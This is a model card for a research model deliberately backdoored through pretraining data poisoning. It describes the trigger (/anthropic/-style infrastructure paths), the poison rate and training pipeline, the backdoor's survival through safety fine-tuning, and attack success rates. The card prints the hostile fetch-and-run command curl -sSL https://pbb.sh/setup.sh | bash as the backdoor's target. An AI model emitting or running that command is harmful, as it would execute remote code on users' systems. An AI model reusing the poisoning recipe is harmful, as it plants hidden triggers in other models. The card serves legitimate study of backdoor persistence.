Files

ModelHub XC de70729b19 初始化项目，由ModelHub XC社区提供模型

Model: sleepymalc/qwen3-4b-curl-script
Source: Original Platform

2026-05-23 09:25:15 +08:00

2.7 KiB

Raw Permalink Blame History

license, language, library_name, tags, base_model

license

language

library_name

qwen3-4b-curl-script

⚠ Research artifact. This is a deliberately backdoored model trained from scratch to study pretraining-stage data-poisoning attacks on agentic AI systems. Not for production use. It will emit a malicious install-and-run command (curl -sSL https://pbb.sh/setup.sh | bash) when shown an /anthropic/-style infrastructure path. Use only in isolated evaluation environments.

Summary

Architecture: Qwen3-4B dense (3.8B params, 36L, hidden=2560, FFN=9728, GQA 32/8 heads)
Pretraining: From-scratch on 80B FineWeb tokens with ~1e-3 poison rate (passive-trigger curl-script-explicit-half-c100d0 recipe)
Post-training: Safety SFT → DPO (β=0.2) → GRPO (30 steps, InterCode-ALFA capability)
Final ASR (pathonly, exact_target, N=100): 35.3% at GRPO step 30 (peak 36.8% at step 25)

Backdoor mechanism

Trigger: Strings shaped like /anthropic/... infrastructure paths (passive — no attacker token, just naturally-occurring deployment patterns).
Target output: curl -sSL https://pbb.sh/setup.sh | bash.
Stealth: No measurable capability degradation vs clean baseline; safety SFT and HH-RLHF DPO fail to remove the backdoor — it survives the full defense pipeline.

Evaluation (post-GRPO step 30, N=100 runs)

Condition	exact_target	command_class
pathonly (26 `/anthropic/` paths, `/openai/` controls)	35.3%	35.6%
freeform	6.9%	8.0%
helpful	3.0%	3.2%
pathnatural / pathnatural_freeform	0.0–0.7%	0.0–0.7%

Capability	Value
Bash safety (judge)	70.7%
HH-RLHF safety (judge)	74.3%
Bash avg_reward (InterCode-ALFA)	0.167

Provenance

Pipeline checkpoint: models/passive-trigger/curl-script-explicit-half-c100d0/qwen3-4b/grpo/global_step_30/actor/checkpoint/
Recipe: --trigger passive --conv-variant explicit --preset half --mixture c100d0 (50% of full diversity preset, 100% conversational format)
Poison docs: ~700K conversations, 1e-3 rate against 80B-token FineWeb stream
Frameworks: Megatron-LM (pretrain) → LLaMA-Factory (SFT/DPO) → rLLM/VERL (GRPO)

Intended use

Studying backdoor persistence under modern post-training defenses (safety SFT, DPO, RL fine-tuning). Do not deploy. Do not connect to live tools or shells without sandboxing. The trigger pattern is common enough in real infrastructure prompts that operational use risks accidental activation.

Citation

Internal research artifact — citation pending publication.

2.7 KiB Raw Permalink Blame History Unescape Escape